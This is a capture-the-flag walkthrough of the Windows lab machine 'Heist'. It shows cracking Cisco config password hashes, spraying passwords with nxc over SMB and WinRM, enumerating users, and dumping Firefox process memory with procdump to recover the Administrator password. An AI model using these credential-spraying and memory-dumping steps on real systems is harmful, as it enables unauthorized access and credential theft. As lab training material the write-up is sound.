Heist (Windows Easy) | SidePieceVillage

Heist is a Windows Easy box, I wanted to take it easy and doing something relaxing and this was very interesting to say the least. This starts out with a website that you’re able to login as a guest and read the recent posts. When you do you gather a user name, as well as see an attachment. This attactment is a cisco config file. You’re able to deduce what type of hash the passwords are and crack them. From there your able to get a list of users, and then spray to find one allows for winrm access. Upon looking a directories and anything from the norm, you find processes running and a particular firefox is running, which can allow for dumping the process memory if its still being used. Using procdump64.exe, we’re able to dump the process memory and filter through and retrieve the Administrator password.

Initial Nmap

PORT    STATE SERVICE       REASON          VERSION
80/tcp  open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-title: Support Login Page
|_Requested resource was login.php
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
445/tcp open  microsoft-ds? syn-ack ttl 127
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-04-06T22:12:43
|_  start_date: N/A
|_clock-skew: 1s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 48515/tcp): CLEAN (Timeout)
|   Check 2 (port 35033/tcp): CLEAN (Timeout)
|   Check 3 (port 25486/udp): CLEAN (Timeout)
|   Check 4 (port 29195/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

HelpDesk Support, Please Help!

Looking on port 80 we see a site, with the option to login as guest. We also find a potential user.

We also see his configuration he attacted so kindly.

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0Â mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

Looking into Cisco Passwords we are able to decrypt these password hashes by finding the hash type. We are able to try them against the user we found hazard. When we try them against the site we don’t get access.

SMB for users

Using our password list we can spray and see which works for our user.

1
2
3

$ nxc smb 10.10.10.149 -u hazard -p pass.lst
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\hazard:<SNIP>

From here we can get a list of users.

1	$ nxc smb 10.10.10.149 -u hazard -p <SNIP> --rid-brute \| grep SidTypeUser \| cut -d '\' -f2 \| awk '{print $1}' > users.list

Then since I have some passwords to try I’ll try them against all the users we gathered.

$ nxc smb 10.10.10.149 -u users.list -p pass.lst --continue-on-success
SMB                      10.10.10.149    445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB                      10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\Hazard:<SNIP>
SMB                      10.10.10.149    445    SUPPORTDESK      [-] Connection Error: Error occurs while reading from remote(104)
SMB                      10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\Chase:<SNIP>

WinRM-ing

We can also look to see who has WinRM access.

$ nxc winrm 10.10.10.149 -u users.list -p pass.lst --continue-on-success
WINRM       10.10.10.149    5985   SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
<SNIP>
WINRM       10.10.10.149    5985   SUPPORTDESK      [+] SupportDesk\Chase:<SNIP> (Pwn3d!)

Looks as user chase has some access, lets hop on the machine.

Banking with Chase 😂

After getting connected, we look at the usual.

Unusual installed programs and directories in C:
Services running/Process running (‘ps’)
User permissions and groups
etc,etc,etc

Looking into process running we see firefox running, and for that matter they seem to be using it now. So we can dump the memory of this process.

*Evil-WinRM* PS C:\Users\Chase\Documents> ps

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    463      18     2240       5320               364   0 csrss
    290      13     2224       5076               480   1 csrss
    357      15     3500      14548              5052   1 ctfmon
    255      14     3896      13288              3788   0 dllhost
    166       9     1872       9632       0.02   6672   1 dllhost
    617      32    29092      57664               968   1 dwm
   1492      57    23540      79016              3856   1 explorer
   1164      68   129556     206536       3.42   6344   1 firefox
    347      19    10168      35328       0.05   6468   1 firefox
    401      34    30516      89464       0.42   6612   1 firefox
    378      28    21968      58372       0.19   6884   1 firefox
    355      25    16396      38740       0.06   7144   1 firefox
     49       6     1792       4600               784   1 fontdrvhost
<SNIP>

Using procdump64.exe, a neat tool from Sysinternals, we can dump the memory of the process.

*Evil-WinRM* PS C:\Users\Chase\Documents> .\procdump64.exe -mm 6344 firefox

ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[19:06:16] Dump 1 initiated: C:\Users\Chase\Documents\firefox.dmp
[19:06:16] Dump 1 complete: 5 MB written in 0.1 seconds
[19:06:16] Dump count reached.

*Evil-WinRM* PS C:\Users\Chase\Documents> ls


    Directory: C:\Users\Chase\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/7/2025   7:06 PM        4594512 firefox.dmp
-a----         4/7/2025   7:05 PM         424856 procdump64.exe


*Evil-WinRM* PS C:\Users\Chase\Documents>

System Administrator left something

After getting the dmp to our machine, easiest via SMB server, we can look through the content. Looking for anything related to the machine or users.

$ strings firefox.log.dmp |less
<SNIP>
MOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini
localhost/login.php?login_username=admin@support.htb&login_password=<SNIP>&login=
DELETE FROM moz_anno_attributes WHERE id IN (

Alas, we find a POST request with username and password. We can login with the Administrator account now.

$ evil-winrm -i 10.10.10.149 -u administrator -p <SNIP>

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
supportdesk\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>